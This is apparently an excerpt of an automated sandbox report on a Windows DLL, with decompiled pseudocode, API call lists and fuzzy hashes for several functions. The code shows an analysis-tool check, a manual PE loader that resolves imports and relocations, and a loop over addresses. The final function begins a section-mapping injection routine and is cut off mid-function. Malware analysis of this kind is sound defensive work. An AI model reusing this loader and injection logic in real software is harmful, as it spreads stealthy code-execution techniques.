    • Instruction Fuzzy Hash: 12D124B56006049FCB28CF69D8D4A6AB7F1FF88344B25892DE88ACB701D771F995CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E10004D6E(intOrPtr* __ecx, void* __edx, void* __fp0) {
    				char _v516;
    				char _v556;
    				char _v564;
    				char _v568;
    				char _v572;
    				char _v576;
    				intOrPtr _v580;
    				char _v588;
    				signed int _v596;
    				intOrPtr _v602;
    				intOrPtr _v604;
    				char _v608;
    				CHAR* _v612;
    				CHAR* _v616;
    				signed int _v620;
    				signed int _v624;
    				signed int _v628;
    				signed int _v632;
    				char _v636;
    				intOrPtr _t117;
    				signed int _t120;
    				CHAR* _t122;
    				intOrPtr _t123;
    				CHAR* _t125;
    				WCHAR* _t128;
    				intOrPtr _t131;
    				intOrPtr _t135;
    				WCHAR* _t136;
    				intOrPtr _t140;
    				WCHAR* _t141;
    				CHAR* _t142;
    				intOrPtr _t143;
    				intOrPtr _t148;
    				intOrPtr _t151;
    				WCHAR* _t152;
    				signed int _t157;
    				WCHAR* _t158;
    				intOrPtr _t161;
    				intOrPtr _t163;
    				intOrPtr _t164;
    				intOrPtr _t168;
    				signed int _t171;
    				signed int _t176;
    				WCHAR* _t180;
    				char _t181;
    				intOrPtr _t195;
    				intOrPtr _t206;
    				signed int _t210;
    				char _t215;
    				WCHAR* _t226;
    				intOrPtr _t230;
    				intOrPtr _t233;
    				WCHAR* _t234;
    				signed int _t235;
    				signed int _t242;
    				signed int _t244;
    				signed int _t245;
    				CHAR* _t246;
    				intOrPtr _t258;
    				intOrPtr _t266;
    				void* _t267;
    				void* _t269;
    				intOrPtr _t270;
    				void* _t276;
    				intOrPtr _t278;
    				void* _t295;
    				void* _t296;
    				intOrPtr _t302;
    				WCHAR* _t322;
    				CHAR* _t323;
    				void* _t325;
    				WCHAR* _t326;
    				intOrPtr _t328;
    				WCHAR* _t330;
    				signed int _t333;
    				intOrPtr* _t335;
    				void* _t354;
    
    				_t354 = __fp0;
    				_t335 = (_t333 & 0xfffffff8) - 0x26c;
    				_t117 =  *0x1001e688; // 0x2ff04a0
    				_t242 = 0;
    				_t325 = __ecx;
    				_v620 = 0;
    				if(( *(_t117 + 0x1898) & 0x00000082) == 0) {
    					L8:
    					_t13 = E1000B78E(0x1001b9c0,  &_v516) + 1; // 0x1
    					E1000A853( &_v556, _t13, 0);
    					_t295 = 0x64;
    					_t120 = E1000A457( &_v556, _t295);
    					 *0x1001e748 = _t120;
    					if(_t120 != 0) {
    						_push(0x4e5);
    						_t296 = 0x10;
    						 *0x1001e680 = E1000E1C7(0x1001b9c4, _t296);
    						 *_t335 = 0x610;
    						_t122 = E100095C7(0x1001b9c4);
    						_push(_t242);
    						_push(_t122);
    						_v612 = _t122;
    						_t123 =  *0x1001e688; // 0x2ff04a0
    						_t125 = E100092CB(_t123 + 0x228);
    						_t315 = _t125;
    						_v616 = _t125;
    						E100085BB( &_v612);
    						_t128 = E1000B24F(_t125);
    						__eflags = _t128;
    						if(_t128 != 0) {
    							_t234 = E10008955(_t315, 1, _t242, _t242);
    							__eflags = _t234;
    							if(_t234 != 0) {
    								_t235 = E1000A2C9(_t234);
    							} else {
    								_t235 = _t242;
    							}
    							 *((intOrPtr*)(_t325 + 0x10)) = _t235;
    							 *_t325 = 3;
    						}
    						E10008600( &_v616, 0xfffffffe);
    						_t131 =  *0x1001e688; // 0x2ff04a0
    						_t21 = _t131 + 0x114; // 0x2ff05b4
    						E10004A0C( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x110)))), _t21, _t354, _t325, _t242, _t242);
    						_t258 =  *0x1001e688; // 0x2ff04a0
    						__eflags =  *((intOrPtr*)(_t258 + 0x101c)) - 3;
    						if( *((intOrPtr*)(_t258 + 0x101c)) == 3) {
    							L19:
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							_v572 = _t325;
    							_v576 =  *((intOrPtr*)(_t258 + 0x214));
    							_t135 =  *0x1001e680; // 0x0
    							_t136 =  *(_t135 + 8);
    							__eflags = _t136;
    							if(_t136 != 0) {
    								 *_t136(_t242, _t242, 1,  &_v568,  &_v564);
    							}
    							_v620 = _t242;
    							E1000E2D1(_t354,  &_v576);
    							_pop(_t258);
    							_t140 =  *0x1001e6b4; // 0x306fa20
    							_t141 =  *((intOrPtr*)(_t140 + 0x10))(_t242, _t242,  &_v620);
    							__eflags = _t141;
    							if(_t141 == 0) {
    								E1000E2D1(_t354,  &_v588);
    								_t230 =  *0x1001e6b4; // 0x306fa20
    								_pop(_t258);
    								 *((intOrPtr*)(_t230 + 0xc))(_v632);
    							}
    							__eflags =  *0x1001e73c;
    							if( *0x1001e73c <= 0) {
    								goto L37;
    							} else {
    								_t163 =  *0x1001e680; // 0x0
    								__eflags =  *((intOrPtr*)(_t163 + 8)) - _t242;
    								if( *((intOrPtr*)(_t163 + 8)) != _t242) {
    									_t226 =  *(_t163 + 0xc);
    									__eflags = _t226;
    									if(_t226 != 0) {
    										 *_t226(_v580);
    									}
    								}
    								_t164 =  *0x1001e688; // 0x2ff04a0
    								_t258 =  *((intOrPtr*)(_t164 + 0x214));
    								__eflags = _t258 - 3;
    								if(_t258 == 3) {
    									goto L37;
    								} else {
    									__eflags =  *((intOrPtr*)(_t164 + 4)) - 6;
    									if( *((intOrPtr*)(_t164 + 4)) >= 6) {
    										__eflags =  *((intOrPtr*)(_t164 + 0x101c)) - 3;
    										if( *((intOrPtr*)(_t164 + 0x101c)) != 3) {
    											goto L37;
    										}
    										E100049A6();
    										asm("stosd");
    										asm("stosd");
    										asm("stosd");
    										asm("stosd");
    										_t168 =  *0x1001e684; // 0x306f878
    										 *((intOrPtr*)(_t168 + 0xd8))( &_v608);
    										_t266 = _v602;
    										_t244 = 0x3c;
    										_t171 = _t266 + 0x00000002 & 0x0000ffff;
    										_v596 = _t171;
    										_v620 = _t171 / _t244 + _v604 & 0x0000ffff;
    										_t176 = _t266 + 0x0000000e & 0x0000ffff;
    										_v624 = _t176;
    										_v628 = _t176 / _t244 + _v604 & 0x0000ffff;
    										_t180 = E100085EA(0x1000);
    										_v632 = _t180;
    										_pop(_t267);
    										__eflags = _t180;
    										if(_t180 != 0) {
    											_t181 = E1000109A(_t267, 0x148);
    											_t302 =  *0x1001e688; // 0x2ff04a0
    											_v636 = _t181;
    											_push(_t302 + 0x648);
    											_push(0xa);
    											_push(7);
    											_t269 = 2;
    											E10009013(_t269,  &_v572);
    											_t270 =  *0x1001e688; // 0x2ff04a0
    											_t330 = E100060C5( &_v572, _t270 + 0x228, 1,  *((intOrPtr*)(_t270 + 0xa0)));
    											_v616 = _t330;
    											__eflags = _t330;
    											if(_t330 != 0) {
    												_push(_v624 % _t244 & 0x0000ffff);
    												_push(_v628 & 0x0000ffff);
    												_push(_v596 % _t244 & 0x0000ffff);
    												_push(_v620 & 0x0000ffff);
    												_push(_t330);
    												_push( &_v572);
    												_t195 =  *0x1001e688; // 0x2ff04a0
    												__eflags = _t195 + 0x1020;
    												E10009626(_v632, 0x1000, _v636, _t195 + 0x1020);
    												E100085BB( &_v636);
    												E1000A8F7(_v632, 0, 0xbb8, 1);
    												E10008600( &_v616, 0xfffffffe);
    											}
    											E10008600( &_v632, 0xfffffffe);
    										}
    										goto L42;
    									}
    									__eflags = _t258 - 2;
    									if(_t258 != 2) {
    										goto L37;
    									}
    									E100049A6();
    									asm("stosd");
    									asm("stosd");
    									asm("stosd");
    									asm("stosd");
    									_t206 =  *0x1001e684; // 0x306f878
    									 *((intOrPtr*)(_t206 + 0xd8))( &_v608);
    									_t210 = _v602 + 0x00000002 & 0x0000ffff;
    									_v628 = _t210;
    									_t245 = 0x3c;
    									_v632 = _t210 / _t245 + _v604 & 0x0000ffff;
    									_t322 = E100085EA(0x1000);
    									_v624 = _t322;
    									_pop(_t276);
    									__eflags = _t322;
    									if(_t322 != 0) {
    										_t215 = E100095C7(_t276, 0x32d);
    										_t278 =  *0x1001e688; // 0x2ff04a0
    										_push(_t278 + 0x228);
    										_push(_v628 % _t245 & 0x0000ffff);
    										_v636 = _t215;
    										E10009626(_t322, 0x1000, _t215, _v632 & 0x0000ffff);
    										E100085BB( &_v636);
    										E1000A8F7(_t322, 0, 0xbb8, 1);
    										E10008600( &_v624, 0xfffffffe);
    									}
    									goto L42;
    								}
    							}
    						} else {
    							_t233 =  *((intOrPtr*)(_t258 + 0x214));
    							__eflags = _t233 - 3;
    							if(_t233 == 3) {
    								goto L19;
    							}
    							__eflags =  *((intOrPtr*)(_t258 + 4)) - 6;
    							if( *((intOrPtr*)(_t258 + 4)) >= 6) {
    								L37:
    								_t142 = E100095C7(_t258, 0x610);
    								_push(_t242);
    								_push(_t142);
    								_v616 = _t142;
    								_t143 =  *0x1001e688; // 0x2ff04a0
    								_t326 = E100092CB(_t143 + 0x228);
    								_v612 = _t326;
    								__eflags = _t326;
    								if(_t326 != 0) {
    									_t158 = E1000B24F(_t326);
    									__eflags = _t158;
    									if(_t158 != 0) {
    										_t161 =  *0x1001e684; // 0x306f878
    										 *((intOrPtr*)(_t161 + 0x10c))(_t326);
    									}
    									E10008600( &_v612, 0xfffffffe);
    								}
    								E100085BB( &_v616);
    								_t148 =  *0x1001e688; // 0x2ff04a0
    								lstrcpynW(_t148 + 0x438,  *0x1001e740, 0x20a);
    								_t151 =  *0x1001e688; // 0x2ff04a0
    								_t152 = _t151 + 0x228;
    								__eflags = _t152;
    								lstrcpynW(_t152,  *0x1001e738, 0x20a);
    								_t328 =  *0x1001e688; // 0x2ff04a0
    								_t115 = _t328 + 0x228; // 0x2ff06c8
    								 *((intOrPtr*)(_t328 + 0x434)) = E10008FA4(_t115, __eflags);
    								E10008600(0x1001e740, 0xfffffffe);
    								E10008600(0x1001e738, 0xfffffffe);
    								L42:
    								_t157 = 0;
    								__eflags = 0;
    								L43:
    								return _t157;
    							}
    							__eflags = _t233 - 2;
    							if(_t233 != 2) {
    								goto L37;
    							}
    							goto L19;
    						}
    					}
    					L9:
    					_t157 = _t120 | 0xffffffff;
    					goto L43;
    				}
    				_t246 = E100095AD(0x6e2);
    				_v616 = _t246;
    				_t323 = E100095AD(0x9f5);
    				_v612 = _t323;
    				if(_t246 == 0 || _t323 == 0) {
    					L7:
    					_t242 = 0;
    					goto L8;
    				} else {
    					if(GetModuleHandleA(_t246) != 0 || GetModuleHandleA(_t323) != 0) {
    						_v620 = 1;
    					}
    					E100085A8( &_v616);
    					_t120 = E100085A8( &_v612);
    					if(_v620 != 0) {
    						goto L9;
    					}
    					goto L7;
    				}
    			}


    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC2
    • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC9
    • lstrcpynW.KERNEL32(02FF0068,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 10005257
    • lstrcpynW.KERNEL32(02FF0278,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 1000526B
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: HandleModulelstrcpyn
    • String ID:
    • API String ID: 3430401031-0
    • Opcode ID: 286693d3f176852be07bbcfb61a8a188315f9be8f2c45d0ace0761040679fd0f
    • Instruction ID: af7c25fddbaaac8c810623370fa574110a5ffa4de8c8a0639458766f2d690bf0
    • Opcode Fuzzy Hash: 286693d3f176852be07bbcfb61a8a188315f9be8f2c45d0ace0761040679fd0f
    • Instruction Fuzzy Hash: 02E1DBB1508341AFF300CF68CC85EABB3E9EB98394F414A2AF584C7295DB71ED448B52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 52%
    			E10012AF7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				signed int _v5;
    				signed short _v12;
    				intOrPtr* _v16;
    				signed int* _v20;
    				intOrPtr _v24;
    				unsigned int _v28;
    				signed short* _v32;
    				struct HINSTANCE__* _v36;
    				intOrPtr* _v40;
    				signed short* _v44;
    				intOrPtr _v48;
    				unsigned int _v52;
    				intOrPtr _v56;
    				_Unknown_base(*)()* _v60;
    				signed int _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				unsigned int _v76;
    				intOrPtr _v80;
    				signed int _v84;
    				intOrPtr _v88;
    				signed int _t149;
    				void* _t189;
    				signed int _t194;
    				signed int _t196;
    				intOrPtr _t236;
    
    				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    				_v24 = _v72;
    				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
    				_v56 = _t236;
    				if(_t236 == 0) {
    					L13:
    					while(0 != 0) {
    					}
    					_push(8);
    					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
    						L35:
    						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
    						while(0 != 0) {
    						}
    						if(_a12 != 0) {
    							 *_a12 = _v68;
    						}
    						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
    						return _v68(_a4, 1, _a8);
    					}
    					_v84 = 0x80000000;
    					_t149 = 8;
    					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
    					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
    						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
    						if(_v36 == 0) {
    							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
    						}
    						if(_v36 != 0) {
    							if( *_v16 == 0) {
    								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
    							} else {
    								_v20 =  *_v16 + _a4;
    							}
    							_v64 = _v64 & 0x00000000;
    							while( *_v20 != 0) {
    								if(( *_v20 & _v84) == 0) {
    									_v88 =  *_v20 + _a4;
    									_v60 = GetProcAddress(_v36, _v88 + 2);
    								} else {
    									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
    								}
    								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
    									 *_v20 = _v60;
    								} else {
    									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
    								}
    								_v20 =  &(_v20[1]);
    								_v64 = _v64 + 4;
    							}
    							_v16 = _v16 + 0x14;
    							continue;
    						} else {
    							_t189 = 0xfffffffd;
    							return _t189;
    						}
    					}
    					goto L35;
    				}
    				_t194 = 8;
    				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
    				_t196 = 8;
    				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
    				while(0 != 0) {
    				}
    				while(_v48 > 0) {
    					_v28 = _v44[2];
    					_v48 = _v48 - _v28;
    					_v28 = _v28 - 8;
    					_v28 = _v28 >> 1;
    					_v32 =  &(_v44[4]);
    					_v80 = _a4 +  *_v44;
    					_v52 = _v28;
    					while(1) {
    						_v76 = _v52;
    						_v52 = _v52 - 1;
    						if(_v76 == 0) {
    							break;
    						}
    						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
    						_v12 =  *_v32 & 0xfff;
    						_v40 = (_v12 & 0x0000ffff) + _v80;
    						if((_v5 & 0x000000ff) != 3) {
    							if((_v5 & 0x000000ff) == 0xa) {
    								 *_v40 =  *_v40 + _v56;
    							}
    						} else {
    							 *_v40 =  *_v40 + _v56;
    						}
    						_v32 =  &(_v32[1]);
    					}
    					_v44 = _v32;
    				}
    				goto L13;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 10012C57
    • LoadLibraryA.KERNEL32(?), ref: 10012C70
    • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CCC
    • GetProcAddress.KERNEL32(00000000,?), ref: 10012CEB
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$HandleLibraryLoadModule
    • String ID:
    • API String ID: 384173800-0
    • Opcode ID: 1dd9d1ec13e0e0c9236e88ac1c4924bd5e04187c8fc8866083520a7049e97579
    • Instruction ID: 40dbc58933749a0a0cd74d6661849015ce43e91b4c911e91057927375977fa56
    • Opcode Fuzzy Hash: 1dd9d1ec13e0e0c9236e88ac1c4924bd5e04187c8fc8866083520a7049e97579
    • Instruction Fuzzy Hash: F5A179B5A00219DFCB54CFA8C881AADBBF1FF08354F108569E915AB361D734EA91CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
    				char _v16;
    				intOrPtr _v20;
    				char _v24;
    				char _v28;
    				void* _t13;
    				intOrPtr _t15;
    				signed int _t16;
    				intOrPtr _t17;
    				signed int _t18;
    				char _t20;
    				intOrPtr _t22;
    				void* _t23;
    				void* _t24;
    				intOrPtr _t29;
    				intOrPtr _t35;
    				intOrPtr _t41;
    				intOrPtr _t43;
    				intOrPtr _t48;
    				void* _t51;
    				signed int _t61;
    				signed int _t64;
    				void* _t71;
    
    				_t71 = __fp0;
    				_t61 = __ecx;
    				_t41 =  *0x1001e6dc; // 0x0
    				_t13 = E1000A4A5(_t41, 0);
    				while(_t13 < 0) {
    					E100097F2( &_v28);
    					_t43 =  *0x1001e6e0; // 0x0
    					_t15 =  *0x1001e6e4; // 0x0
    					_t41 = _t43 + 0xe10;
    					asm("adc eax, ebx");
    					__eflags = _t15 - _v24;
    					if(__eflags > 0) {
    						L9:
    						_t16 = 0xfffffffe;
    						L13:
    						return _t16;
    					}
    					if(__eflags < 0) {
    						L4:
    						_t17 =  *0x1001e684; // 0x306f878
    						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
    						__eflags = _t18;
    						if(_t18 == 0) {
    							break;
    						}
    						_t35 =  *0x1001e684; // 0x306f878
    						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
    						_t41 =  *0x1001e6dc; // 0x0
    						__eflags = 0;
    						_t13 = E1000A4A5(_t41, 0);
    						continue;
    					}
    					__eflags = _t41 - _v28;
    					if(_t41 >= _v28) {
    						goto L9;
    					}
    					goto L4;
    				}
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t20 =  *0x1001e6e8; // 0x0
    				_v28 = _t20;
    				_t22 = E1000A68F(_t41, _t61,  &_v16);
    				_v20 = _t22;
    				if(_t22 != 0) {
    					_t23 = GetCurrentProcess();
    					_t24 = GetCurrentThread();
    					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
    					E100097F2(0x1001e6e0);
    					_t64 = E10001A1B( &_v28, E10001226, _t71);
    					__eflags = _t64;
    					if(_t64 >= 0) {
    						_push(0);
    						_push( *0x1001e760);
    						_t51 = 0x27;
    						E10009EEC(_t51);
    					}
    				} else {
    					_t64 = _t61 | 0xffffffff;
    				}
    				_t29 =  *0x1001e684; // 0x306f878
    				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
    				_t48 =  *0x1001e6dc; // 0x0
    				 *0x1001e6d0 = 0;
    				E1000A4C1(_t48);
    				E10008600( &_v24, 0);
    				_t16 = _t64;
    				goto L13;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d1b745fdbffcc919f21494d6dc9c505ee260cdefba6441b02a46ce43fb73c69e
    • Instruction ID: d906aae5790399c38ac9c36321e5d7763f5971439be1128eebad97b72ddd2630
    • Opcode Fuzzy Hash: d1b745fdbffcc919f21494d6dc9c505ee260cdefba6441b02a46ce43fb73c69e
    • Instruction Fuzzy Hash: E131B4366082A4AFF344DFA4DCC5C6E77A9FB983E0B904A2AF541D71A5DE30ED048752
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E10001B2D(void* __eflags, void* __fp0) {
    				char _v24;
    				char _v28;
    				void* _t12;
    				intOrPtr _t14;
    				void* _t15;
    				intOrPtr _t16;
    				void* _t17;
    				void* _t19;
    				void* _t20;
    				char _t24;
    				intOrPtr _t26;
    				intOrPtr _t28;
    				intOrPtr _t33;
    				intOrPtr _t38;
    				intOrPtr _t40;
    				void* _t41;
    				intOrPtr _t46;
    				void* _t48;
    				intOrPtr _t51;
    				void* _t61;
    				void* _t71;
    
    				_t71 = __fp0;
    				_t38 =  *0x1001e6f4; // 0x0
    				_t12 = E1000A4A5(_t38, 0);
    				while(_t12 < 0) {
    					E100097F2( &_v28);
    					_t40 =  *0x1001e700; // 0x0
    					_t14 =  *0x1001e704; // 0x0
    					_t41 = _t40 + 0x3840;
    					asm("adc eax, ebx");
    					__eflags = _t14 - _v24;
    					if(__eflags > 0) {
    						L13:
    						_t15 = 0;
    					} else {
    						if(__eflags < 0) {
    							L4:
    							_t16 =  *0x1001e684; // 0x306f878
    							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
    							__eflags = _t17;
    							if(_t17 == 0) {
    								break;
    							} else {
    								_t33 =  *0x1001e684; // 0x306f878
    								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
    								_t51 =  *0x1001e6f4; // 0x0
    								__eflags = 0;
    								_t12 = E1000A4A5(_t51, 0);
    								continue;
    							}
    						} else {
    							__eflags = _t41 - _v28;
    							if(_t41 >= _v28) {
    								goto L13;
    							} else {
    								goto L4;
    							}
    						}
    					}
    					L12:
    					return _t15;
    				}
    				E100097F2(0x1001e700);
    				_t19 = GetCurrentProcess();
    				_t20 = GetCurrentThread();
    				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t24 =  *0x1001e6e8; // 0x0
    				_v28 = _t24;
    				_t61 = E10001A1B( &_v28, E1000131E, _t71);
    				if(_t61 >= 0) {
    					_push(0);
    					_push( *0x1001e760);
    					_t48 = 0x27;
    					E10009EEC(_t48);
    				}
    				if(_v24 != 0) {
    					E10006876( &_v24);
    				}
    				_t26 =  *0x1001e684; // 0x306f878
    				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
    				_t28 =  *0x1001e758; // 0x0
    				 *0x1001e6ec = 0;
    				_t29 =  !=  ? 1 : _t28;
    				_t46 =  *0x1001e6f4; // 0x0
    				 *0x1001e758 =  !=  ? 1 : _t28;
    				E1000A4C1(_t46);
    				_t15 = _t61;
    				goto L12;
    			}

    APIs
    • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
    • GetCurrentThread.KERNEL32 ref: 10001BCF
    • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
    • DuplicateHandle.KERNEL32(00000000), ref: 10001BD9
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: Current$Process$DuplicateHandleThread
    • String ID:
    • API String ID: 3566409357-0
    • Opcode ID: 982b2c05f984020617e5bef145b75b34b208ca43f29a0efeb761dedb6e1fabef
    • Instruction ID: d1363189eadf394b0d6d3c5faf128b237252a217eef9a43260953257b15cddd2
    • Opcode Fuzzy Hash: 982b2c05f984020617e5bef145b75b34b208ca43f29a0efeb761dedb6e1fabef
    • Instruction Fuzzy Hash: 9C31AD796083A19FF704DF64CCD8D6E77A9EB983D0B408928F601872A6DB30EC44CB52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E10001A1B(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				CHAR* _v20;
    				char _v36;
    				signed short _t22;
    				CHAR* _t23;
    				CHAR* _t24;
    				CHAR* _t32;
    				intOrPtr _t37;
    				CHAR* _t38;
    				CHAR* _t39;
    				intOrPtr _t40;
    				intOrPtr _t54;
    				char* _t57;
    				signed int _t60;
    				signed int _t61;
    				signed int _t64;
    				CHAR* _t66;
    				void* _t74;
    
    				_t74 = __fp0;
    				_t40 = __ecx;
    				_t37 = __edx;
    				_v12 = __ecx;
    				_t57 =  *0x1001e6f0; // 0x0
    				_push(_t60);
    				_t61 = _t60 | 0xffffffff;
    				_v16 = __edx;
    				_t66 = _t61;
    				if( *_t57 != 0) {
    					L6:
    					_t22 =  *0x1001e6fc; // 0x0
    					_t72 = _t22;
    					if(_t22 == 0) {
    						goto L9;
    					} else {
    						_t24 = E1000160D(_t37, _t57, _t72, _t22 & 0x0000ffff, _t40);
    						_t66 = _t24;
    						if(_t66 < 0) {
    							goto L9;
    						} else {
    						}
    					}
    				} else {
    					_push(0x2d);
    					_t39 = E10009E8B();
    					_v20 = _t39;
    					_t32 = E10009E4C(0x2e);
    					_v8 = _t32;
    					if(_t39 != 0 && _t32 != _t61) {
    						_t54 =  *0x1001e6f0; // 0x0
    						E100096B0(_t54, _t39, 0x100);
    						 *0x1001e6fc = _v8;
    					}
    					E10008600( &_v20, _t61);
    					_t57 =  *0x1001e6f0; // 0x0
    					if( *_t57 == 0) {
    						L9:
    						_t38 = 0;
    						_v8 = 0;
    						_t23 = E10001778( &_v8, _t74);
    						_v20 = _t23;
    						__eflags = _t23;
    						if(_t23 != 0) {
    							__eflags = _v8;
    							if(_v8 > 0) {
    								_t13 =  &(_t23[4]); // 0x4
    								_t64 = _t13;
    								while(1) {
    									__eflags =  *_t64;
    									if(__eflags != 0) {
    										__imp__#12(0x10);
    										lstrcpynA( &_v36, _t23,  *_t64);
    										_t23 = E1000160D(_v16,  &_v36, __eflags,  *(_t64 + 4) & 0x0000ffff, _v12);
    										_t66 = _t23;
    									}
    									__eflags = _t66;
    									if(_t66 >= 0) {
    										break;
    									}
    									_t38 = _t38 + 1;
    									_t64 = _t64 + 0x20;
    									__eflags = _t38 - _v8;
    									if(_t38 < _v8) {
    										continue;
    									}
    									break;
    								}
    								_t61 = _t64 | 0xffffffff;
    								__eflags = _t61;
    							}
    							E10008600( &_v20, _v8);
    						}
    						__eflags = _t66;
    						_t62 =  >=  ? _t66 : _t61;
    						_t24 =  >=  ? _t66 : _t61;
    					} else {
    						_t37 = _v16;
    						_t40 = _v12;
    						goto L6;
    					}
    				}
    				return _t24;
    			}

    APIs
    • inet_ntoa.WS2_32(00000004), ref: 10001ADB
    • lstrcpynA.KERNEL32(?,00000000), ref: 10001AE6
      • Part of subcall function 100096B0: memset.MSVCRT ref: 100096D9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: inet_ntoalstrcpynmemset
    • String ID: @}s
    • API String ID: 129148211-1738643329
    • Opcode ID: 11795a285bf89cebb4f9c0d4940ad6dddf9e271b37e48aaca9a923e92fe3d613
    • Instruction ID: bc20ad2b03a49fadc3bce8d2214928905f70a7fbf5e9e1e62064ea73bd786d80
    • Opcode Fuzzy Hash: 11795a285bf89cebb4f9c0d4940ad6dddf9e271b37e48aaca9a923e92fe3d613
    • Instruction Fuzzy Hash: CA31C936E04366ABFB01CFE4D881ADE77F5EB48390F21465AE510A72D5EB319E40CB94
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    C-Code - Quality: 86%
    			E1000C6CB(void* __ecx, intOrPtr __edx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				long _v24;
    				long _v28;
    				void* _v32;
    				intOrPtr _v36;
    				long _v40;
    				void* _v44;
    				char _v56;
    				char _v72;
    				struct _WNDCLASSEXA _v120;
    				void* _t69;
    				intOrPtr _t75;
    				struct HWND__* _t106;
    				intOrPtr* _t113;
    				struct _EXCEPTION_RECORD _t116;
    				void* _t126;
    				void* _t131;
    				intOrPtr _t134;
    				void* _t140;
    				void* _t141;
    
    				_t69 =  *0x1001e688; // 0x87804a0
    				_t126 = __ecx;
    				_t134 = __edx;
    				_t116 = 0;
    				_v36 = __edx;
    				_v16 = 0;
    				_v44 = 0;
    				_v40 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				_v24 = 0;
    				_v20 = __ecx;
    				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
    					E1000E249(0x1f4);
    					_t116 = 0;
    				}
    				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
    				_v28 = _t116;
    				if( *_t113 != 0x4550) {
    					L12:
    					if(_v8 != 0) {
    						_t75 =  *0x1001e780; // 0x87ff9a0
    						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
    						_v8 = _v8 & 0x00000000;
    					}
    					L14:
    					if(_v12 != 0) {
    						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
    					}
    					if(_v16 != 0) {
    						NtClose(_v16);
    					}
    					return _v8;
    				}
    				_v44 =  *((intOrPtr*)(_t113 + 0x50));
    				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
    					goto L12;
    				}
    				_v120.style = 0xb;
    				_v120.cbSize = 0x30;
    				_v120.lpszClassName =  &_v56;
    				asm("movsd");
    				_v120.lpfnWndProc = DefWindowProcA;
    				asm("movsd");
    				asm("movsd");
    				asm("movsb");
    				asm("movsd");
    				asm("movsd");
    				asm("movsw");
    				asm("movsb");
